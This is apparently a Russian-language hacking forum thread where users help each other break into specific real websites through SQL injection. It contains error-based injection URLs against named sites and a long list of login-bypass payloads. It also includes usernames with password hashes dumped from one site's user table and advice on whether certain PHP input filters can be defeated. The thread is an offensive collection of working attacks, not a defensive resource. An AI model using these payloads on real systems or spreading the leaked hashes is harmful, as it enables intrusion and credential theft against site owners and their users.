Права чего, права кого, права куда? ) В селект запросе на мускуле это сделать невозможно (а булки стоят на мускуле) В апдейт запросе не нужны никакие "права", если скрипт что-то апдейтит, то права у него есть, разумеется НО Скрипт должен апдейтить в базу юзеов булки, что-бы была возможность изменить там что-то + скуль должна быть довольно специфической что-бы удалось сменить хеш. Скрипты самой булки таких багов не имеют, сомневаюсь что есть какие то модули, которые имеют такие баги. Тоесть должен быть какой-то кривой самописный скрипт, работающий с таблицей юзеров, и имеющий скуль в апдейте + куча условий, что невероятно, или скрипт имеющий скуль в апдейте в tbl_name, что ещё менее вероятно. Тоесть ответ - нет, с вероятностью 99.99%
большинство людей под SQL injection подразумевают SQLi именно в select запросе, чтобы не заблуждать человека задающего вопрос нужно было добавить что данный способ работает только в апдейт запросах
http://www.admgor.nnov.ru/script/show_news.php?doc_id=12345 как такое крутить? дальше and 1=2, не ушел...
https://forum.antichat.ru/threadedpost1826253.html не ибейс , но синтаксис похож..почитай..может пригодится
http://titancup.ru/user/?id=11+or+(1,1)=(select+count(0),concat((select+version()+from+information_schema.tables+limit+0,1),floor(rand(0)*2))from(information_schema.tables)+group+by+2)--+ стандартный метод не пробовал, но error based катит
Code: http://titancup.ru/user/?id=11+and%28select+1+from%28select+count%28*%29,concat%28%28select+user%28%29%29,floor%28rand%280%29*2%29%29x+from+information_schema.tables+group+by+x%29a%29--1 upd: Konqi опередил)
ts_manager_users Daven:b7838c7f83d8197f3e46b5d88e3d5a6c White:0d9198487f4ad5fb4407ee44b84df42c demiurg:c16bb5217e34563e2eb9af2d9edabb6c помойму админы бле опередили
Приветствую. В кое какой форме авторизации ввожу кавычку и мне выдаются следующие ошибки. Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 12 Warning: mysql_numrows(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 87 Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/enn/enelis/sys/clientsarea_authenticate.php on line 88 Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 100 Warning: Cannot modify header information - headers already sent by (output started at /home/enn/enelis/sys/clientsarea_authenticate.php:12) in /home/enn/enelis/sys/clientsarea_authenticate.php on line 101 Это является sql иньекцией? И можно что-то с этим сделать?
Пробуй обойти авторизацию так: admin' -- admin' # admin'/* ' or ''=' ' or 'x'='x " or "x"="x ') or ('x'='x 0 or 1=1 ' or 0=0 -- " or 0=0 -- or 0=0 -- ' or 0=0 # " or 0=0 # or 0=0 # ' or 1=1-- " or 1=1-- ' or '1'='1'-- "' or 1 --'" or 1=1-- or%201=1 or%201=1 -- ' or 1=1 or ''=' " or 1=1 or ""=" ' or a=a-- " or "a"="a ') or ('a'='a ") or ("a"="a hi" or "a"="a hi" or 1=1 -- hi' or 1=1 -- hi' or 'a'='a hi') or ('a'='a hi") or ("a"="a 'hi' or 'x'='x'; ' or 1=1-- ' or 1=1# ' or 1=1/* ') or '1'='1-- ') or ('1'='1-- ' or username like '% ' or uname like '% ' or userid like '% ' or uid like '% ' or user like '% ' or 1=1 or ''=' ' or ''=' x' or 1=1 or 'x'='y
Есть такой кусок кода PHP: // Check IP From IP Logging Database $get_voted_aids = $wpdb->get_col("SELECT pollip_aid FROM $wpdb->pollsip WHERE pollip_qid = $poll_id AND pollip_ip = '".get_ipaddress()."' $log_expiry_sql"); в функции get_ipaddress() есть возможность подставить свои данные вместо ip, однако вконце все это дело обрабатывается функцией esc_attr() (подробней тут http://wp-kama.ru/function/esc_attr), она преобразует знаки в html сущности: < > & " ', может есть все же какой вариант выйти из запроса и провести sql inj, или я опять в пролете ?
Уважаемые гуру, Есть код, где _GET, _POST и _COOKIE "фильтруются" так: PHP: $_POST = security($_POST); $_GET = security($_GET); $_COOKIE = security($_COOKIE); Функция сукурити: PHP: function security($value) { if (is_array($value)) { $value = array_map('security', $value); }else{ if(!get_magic_quotes_gpc()) { $value = htmlspecialchars($value, ENT_QUOTES, 'UTF-8'); }else{ $value = htmlspecialchars(stripslashes($value), ENT_QUOTES, 'UTF-8'); } $value = str_replace("\\", "\\\\", $value); } return $value; } htmlspecialchars() и stripslashes() не выход жэ, чтобы защититься от SQLi ? Можно ли эксплуатировать? Еще интересна функция array_map(), кажется мне, пахнет код экзекушн, не ?
Можно только если данные в запросе не будут браться в кавычки, т.е. что то типа такого PHP: $get = "SELECT * FROM `test` WHERE `id`= $id"; Потому что htmlspecialchars() будет избавляться от кавычек, из запроса в таком случае не выйдешь, а stripslashes() будет разбираться со слешем с помощью которого можно было бы провести фрагментированную SQL inj при подходящих условиях. По поводу array_map(), то тут вроде как нет выполнения, калл бэк функция уже определена по умолчанию, сменить нельзя
Скобки юзай: http://www.afr.ru/region/(303)and(1)=(0) false http://www.afr.ru/region/(303)and(1)=(1) true